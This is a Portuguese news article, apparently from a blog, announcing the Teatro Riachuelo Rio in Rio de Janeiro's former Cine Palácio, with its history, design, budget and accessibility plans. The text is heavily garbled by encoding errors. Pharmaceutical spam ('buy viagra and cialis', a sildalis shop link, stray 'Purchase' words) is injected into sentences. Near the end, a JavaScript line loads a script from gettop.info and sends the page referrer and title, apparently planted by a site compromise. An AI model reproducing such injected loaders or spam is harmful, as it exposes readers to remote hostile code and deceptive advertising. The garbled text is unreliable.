NotíciaRio de Janeiro

Rio de Janeiro ganharA? um novo teatro

Teatro Riachuelo Rio serA? inaugurado, em agosto, em prA�dio histA?rico que abrigava o antigo Cine PalA?cio, na CinelA?ndia.

 

ProjeA�A?o final da fachada
ProjeA�A?o final da fachada

Um dos espaA�os mais tradicionais do Rio de Janeiro, tombado pelo patrimA?nio histA?rico, o antigo Cine PalA?cio, em plena CinelA?ndia, voltarA?, em 12 de agosto, A� cidade. ApA?s dois anos de intenso trabalho de restauraA�A?o e intervenA�A�es modernas, o Teatro Riachuelo Rio serA? um espaA�o plural de expressA?o e arte, unindo mA?sica, teatro, literatura, debates, danA�a, entre outros, com o objetivo de atrair os mais diversos pA?blicos. O espaA�o, ainda em obras, foi apresentado a imprensa e convidados na manhA? de 28 de junho.

Com o fim das atividades como cinema em 2008, o local foi comprado pelo Banco Opportunity e a iniciativa da reformulaA�A?o A� da Aventura Teatros, braA�o da Aventura Entretenimento, que tem como sA?cios Aniela Jordan Pills buy viagra and cialis and levitra , Fernando Campos e Luiz Calainho. O centro cultural terA? o que hA? de mais avanA�ado em caixa cA?nica, luz e som. Da cortina para trA?s, tudo foi construA�do. “O Teatro Riachuelo Rio serA? muito mais que um teatro, serA? um centro de arte e cultura multiplataforma. FuncionarA? de terA�a a domingo, o dia todo, com ciclos de palestras, espetA?culos diurnos, filmes e shows, entre outros”, destacou Calainho.

Localizado na CinelA?ndia, berA�o das atividades culturais da cidade, o Teatro Riachuelo Rio estA? a poucos passos da estaA�A?o do metrA? e do VLT, na Rua do Passeio, e A� um dos pilares da revitalizaA�A?o da regiA?o, junto com o Porto Maravilha e todo o centro histA?rico da cidade. Com aproximadamente 3.500 metros quadrados de A?rea construA�da, plateia para 1.000 pessoas e inovaA�A�es digitais, o espaA�o terA? projeto de design de interiores do Studio Zanini, do designer Zanini de Zanine, que foi nomeado designer do ano pela Maison & Objet Americas 2015.
Para inaugurar em grande estilo, o Teatro Riachuelo Rio abrirA? as portas com dois musicais bem brasileiros. O inA�dito Purchase Garota de Ipanema, o amor A� bossa (texto de Telma Guedes e direA�A?o de Gustavo Gasparani) e SamBRA, o musical a�� 100 anos de sambaA�(texto e direA�A?o de Gasparani) retratam e valorizam a cultura nacional atravA�s de dois grandes A�cones da histA?ria brasileira, a bossa nova e o samba.A�”As produA�A�es irA?o se alternar em cartaz durante os Jogos OlA�mpicos e apresentarA?o o samba e a bossa nova para todo o pA?blico local e mundial que estarA? presente na cidade”, contou Aniela Jordan.

Ainda segundo Aniela, o porte e a infraestrutura tA�cnica do teatro permitem sediar praticamente qualquer produA�A?o do mundo. Em nA?meros: 280 metros quadrados de palco, 125 metros quadrados de subpalco, fosso de orquestra com 80 metros quadrados e sala de ensaio com 111 metros quadrados.

Para tornar o local um espaA�o totalmente novo, reconstruA�do e reformulado, a produtora conta com parceria da rede de lojas Riachuelo, que dA? o novo nome ao local. “Acreditamos que a moda A� uma potente ferramenta de arte e expressA?o e, por isso, temos realizado um intenso trabalho para democratizar cada vez mais o acesso dos brasileiros a esse universo. O Teatro Riachuelo Rio vem para ampliar ainda mais essa rede de acesso A� arte e expressA?o com foco em cultura, que foi jA? foi iniciada hA? seis anos com a inauguraA�A?o do Teatro Riachuelo Natal”, explicouA�FlA?vio Rocha, presidente da empresa.

 

PatrimA?nio histA?rico

Ponto de encontro de artistas, intelectuais e polA�ticos, frequentado por milhares de pessoas ao longo de sua existA?ncia, o prA�dio foi construA�do no sA�culo 19. Inaugurou, em 1890, como Cassino Nacional Brasileiro e logo passou a ser chamado de Cassino Nacional, em 1901. Em 1906 foi renomeado Palace Theater, e funcionou assim atA� 1910. A fachada de arquitetura neo-mourisca foi projetada pelo arquiteto espanhol Adolfo de los Rios.

Com o passar dos anos o prA�dio mudou de nome algumas vezes. Em 1917 foi intitulado como Cinema Majestic; quando exibiu o primeiro filme sonoro no paA�s Broadway Melody, se chamava PalA?cio Teatro (1929); e, finalmente, em 1943, se tornou o Cine PalA?cio.

Todo o processo de restauraA�A?o e construA�A?o do novo teatro foi acompanhado de perto pelo IRPH (Instituto Rio PatrimA?nio da Humanidade). As obras civis caminharam junto com o reparo para ajustar o espaA�o A�s necessidades de um moderno centro cultural. Os principais elementos foram devidamente preservados e restaurados como a fachada, colunas, lustre, piso, fonte com escultura em alto-relevo esculpida na galeria de entrada e diversos outros elementos.

Buy

RecuperaA�A?o das paredes e plateia
RecuperaA�A?o das paredes e plateia

Palco em obras
Palco em obras

http://massageakademin.se/buy-sildalis-online/
 

Teatro Riachuelo Rio em detalhes

O grande desafio das obras foi manter a legitimidade do patrimA?nio histA?rico e criar uma estrutura mais moderna, com dimensA�es que suportassem todos os equipamentos de A?ltima geraA�A?o necessA?rios para o pleno funcionamento do teatro, que foi projetado para comportar os mais diversos tipos de eventos culturais e corporativos. E ainda, alA�m da caixa cA?nica, foi construA�da uma A?rea de apoio capaz de abrigar camarins, sala de ensaio, sala de convivA?ncia dos artistas e toda a infraestrutura tA�cnica. Uma tecnologia de ponta acessa o controle de volume independente, por caixa, para dispersA?o do som 100% homogA?neo na sala.

O projeto de arquitetura do teatro A� assinado por Wanderson Ferreira e Carla Muniz, que conseguiram criar um palco com fosso para formaA�A?o completa de orquestra. O Studio Zanini desenvolveu poltronas exclusivas para o teatro, alA�m de lustres especiais para a restauraA�A?o, que foram aprovados pelo patrimA?nio histA?rico, pois os originais se perderam ao longo dos anos. Em parceria com a Deca/Duratex, o Studio Zanini tambA�m fez uma intervenA�A?o nos banheiros do centro cultural. Toda a louA�a e metais foram desenvolvidos com acabamentos especiais para o projeto e possuem tecnologia voltada para economia de A?gua.

Investimento e obras online

Com a intenA�A?o de manter o antigo Cine PalA?cio como um centro cultural, o Banco Opportunity firmou uma parceria com a Aventura Teatros, que arrendou o local por 20 anos para a viabilizaA�A?o do espaA�o como um teatro. Todo o processo de revitalizaA�A?o e construA�A?o do teatro e do empreendimento tem orA�amento de R$ 42 milhA�es, investidos pelo Opportunity e pela Aventura Teatros. A Riachuelo entra para garantir a manutenA�A?o e a operaA�A?o do espaA�o e seus conteA?dos.

O empreendimento, que serA? integrado ao Teatro Riachuelo Rio, possui estacionamento prA?prio, praA�a de alimentaA�A?o, heliponto e centro comercial. Toda a estrutura moderna do novo complexo garantirA? pleno conforto e praticidade ao pA?blico do teatro.

ProjeA�A?o final do foyer
ProjeA�A?o final do foyer

 

Galeria de acesso ao Teatro Riachuelo Rio e ao Passeio Corporate

Com pA?blico estimado em 10 mil pessoas em circulaA�A?o por dia, a galeria com entrada pela Rua do Passeio, que dA? acesso ao teatro e ao Passeio Corporate, terA? diversas intervenA�A�es e facilidades para os frequentadores. Para partilhar a histA?ria de um dos prA�dios mais importantes e ricos da cidade, um memorial funcionarA? no local, com acesso pA?blico e gratuito.

Considerado um dos maiores biA?grafos brasileiros, o escritor Ruy Castro inicia o projeto de perpetuaA�A?o do acervo histA?rico do prA�dio atravA�s de pesquisa e publicaA�A?o especial de lanA�amento. “Esta galeria jA? teve um glorioso passado, mas agora A� o futuro que vai penetrar por ela” Purchase , comentou Ruy. AlA�m deste material, um documentA?rio serA? produzido em breve.

Para abrigar todas as formas de manifestaA�A?o cultural, o corredor de acesso ao empreendimento comercial terA? uma galeria de arte permanente que irA? reunir os maiores nomes do segmento para expor suas obras no espaA�o.

Fernando Campos (Aventura), Jomar Monnerat (Banco Opportunity), Luiz Calainho (Aventura), Aniela Jordan (Aventura), FlA?vio Rocha (Riachuelo) e o escritor Ruy Castro na coletiva de imprensa (Foto: Felipe Panfili)
Fernando Campos (Aventura), Jomar Monnerat (Banco Opportunity), Luiz Calainho (Aventura), Aniela Jordan (Aventura), FlA?vio Rocha (Riachuelo) e o escritor Ruy Castro na coletiva de imprensa (foto: Felipe Panfili)

 

Acesso para todos

A cada temporada, o Teatro Riachuelo Rio terA? uma sessA?o para pessoas com deficiA?ncia visual e auditiva. A partir de 2017 o espaA�o terA? o serviA�o permanente, em todas as sessA�es, em libras e A?udio descriA�A?o. As principais produA�A�es estarA?o disponA�veis em trA?s idiomas: portuguA?s, espanhol e inglA?s.

AlA�m disso, a fim de promover a democratizaA�A?o da cultura, todos os espetA?culos terA?o uma sessA?o gratuita por temporada com acesso por distribuiA�A?o de senhas.

Para criar intercA?mbio com outros teatros e centros culturais da regiA?o, o Teatro Riachuelo Rio terA? um painel eletrA?nico com informaA�A�es de toda programaA�A?o cultural do centro da cidade, como horA?rios e programaA�A�es, alA�m da prA?pria agenda.

“Sem o instrumento certo, o talento nA?o se transforma em emoA�A?o. Esperamos que o Teatro Ricahuelo Rio seja esse instrumento”, finalizou FlA?vio Rocha, da Riachuelo.

ProjeA�A?o final da plateia
ProjeA�A?o final da plateia
s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.